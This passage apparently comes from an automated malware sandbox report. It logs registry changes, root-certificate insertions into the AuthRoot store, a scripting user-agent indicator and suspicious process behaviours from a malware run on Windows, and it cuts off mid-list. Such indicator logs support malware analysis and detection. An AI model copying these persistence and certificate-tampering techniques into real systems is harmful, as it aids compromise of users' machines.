value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{386390BC-A767-4E92-8313-8E0A6432EFDC} = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEI2WPE3-XE1H-AE42-701D-DPK87XELRL76} rundll32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}\7289246C77593EBF\2 = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI WMIC.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" WMIC.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = c30480779eafd701 WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugeblog.com MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\allhugeblog.com\NumberOfS = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 29b18faf9fafd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\skipvideoads.com\Total = "70" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "230" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\NextUpdateDate = "339144012" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TKR9TRJ3-XT3I-VY52-597M-MXZ27DTVMS64} rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" WMIC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{58865325-3540-4DB9-8375-AECEDBA2B9E8} = "0" WMIC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate WMIC.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000a00acee0e2fe6e3822ee36cf75bc0ef4607d684396b6676fff963462cd519e96690d603f8916ceed3a475a383cd10027c3dec43dcbb20022f5425a49506fab354455b66d315f3425240d6c9714c5bd279f79ef36b260d7223d0f WMIC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugeblog.com\ = "29" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 3 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = eda47e9320aed701 WMIC.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active WMIC.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{D6F33E38-7E29-4AEF-A1CA-89939F37EDCE}" WMIC.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugeblog.com\ = "926" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery WMIC.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore WMIC.exe -
Processes:
Sun19262b9e49ad.exeinstaller.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun19262b9e49ad.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun19262b9e49ad.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 83 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 154 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeInstall.exeWerFault.exeDyzW75Vg9OFYpumqyTL2gvjP.exepid process 1528 powershell.exe 1528 powershell.exe 3496 Install.exe 3496 Install.exe 1528 powershell.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 1584 1584 4584 WerFault.exe 4584 WerFault.exe 4584 WerFault.exe 1584 1584 4584 WerFault.exe 4584 WerFault.exe 1584 1584 1528 powershell.exe 1528 powershell.exe 1584 1584 1584 1584 1584 1584 1584 1584 1584 1584 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe 2804 DyzW75Vg9OFYpumqyTL2gvjP.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 1584 -
Suspicious behavior: MapViewOfSection 15 IoCs
Processes:
Install.exeQSydSxCGLaGDRZ1oU1LJVgeo.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exewcbafrfpid process 3496 Install.exe 4240 QSydSxCGLaGDRZ1oU1LJVgeo.exe 6936 MicrosoftEdgeCP.exe 6936 MicrosoftEdgeCP.exe 1584 1584 1584 1584 1584 1584 5720 MicrosoftEdgeCP.exe 5720 MicrosoftEdgeCP.exe 7188 MicrosoftEdgeCP.exe 7188 MicrosoftEdgeCP.exe 8656 wcbafrf -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
